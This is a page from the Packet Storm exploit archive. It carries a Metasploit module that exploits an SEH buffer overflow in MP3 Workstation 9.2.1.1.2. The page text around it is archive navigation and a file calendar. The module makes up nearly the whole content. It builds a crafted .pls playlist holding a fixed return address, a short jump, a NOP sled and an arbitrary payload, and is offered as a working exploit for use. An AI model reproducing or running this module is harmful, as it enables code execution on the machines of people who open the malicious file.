what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

MP3 Workstation 9.2.1.1.2 SEH Exploit

MP3 Workstation 9.2.1.1.2 SEH Exploit
Posted Sep 23, 2010
Authored by MadjiX

MP3 Workstation version 9.2.1.1.2 SEH exploit to be used with the Metasploit Framework.

tags | exploit
SHA-256 | 622f79cde70b2703c1f8ac11a7b0438b8e3169877deded2403f12cacb6deed23

MP3 Workstation 9.2.1.1.2 SEH Exploit

Change Mirror Download
# Exploit Climatisée fermee la Porte DeRrière Twaa xDeii
# Title: MP3 Workstation Version 9.2.1.1.2 buffer overflow exploit (MSF)
# Sanjeev Gupta san.gupta86[at]gmail.com (http://www.exploit-db.com/exploits/15013/)
# Author: MadjiX
# Sec4ever.com
# WinXp Fr

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'MP3 Workstation Version 9.2.1.1.2 buffer overflow',
'License' => MSF_LICENSE,
'Author' => 'MadjiX',
'Version' => 'Version 1',
'References' =>
[
[ 'OSVDB', '' ],
[ 'URL', 'http://www.exploit-db.com/exploits/15013/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 4488,
'BadChars' => "\x00\x20\x0a\x0d",
'StackAdjustment' => -3500,
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => 0x733DB159} ],

],
'Privileged' => false,
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'mad.pls']),
], self.class)
end


def exploit

sploit = "MP3 Workstation"
sploit << "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0D\x0A\x46\x69\x6C\x65\x31\x3D" #header -Sanjeev
sploit << rand_text_alphanumeric(1940)
sploit << "\xeb\x06\x90\x90" # short jump 6 bytes
sploit << [target.ret].pack('V')
sploit << "\x90" * 12 # nop sled
sploit << payload.encoded
sploit << "\x90" * 2805

mad = sploit
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(mad)

end

end

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close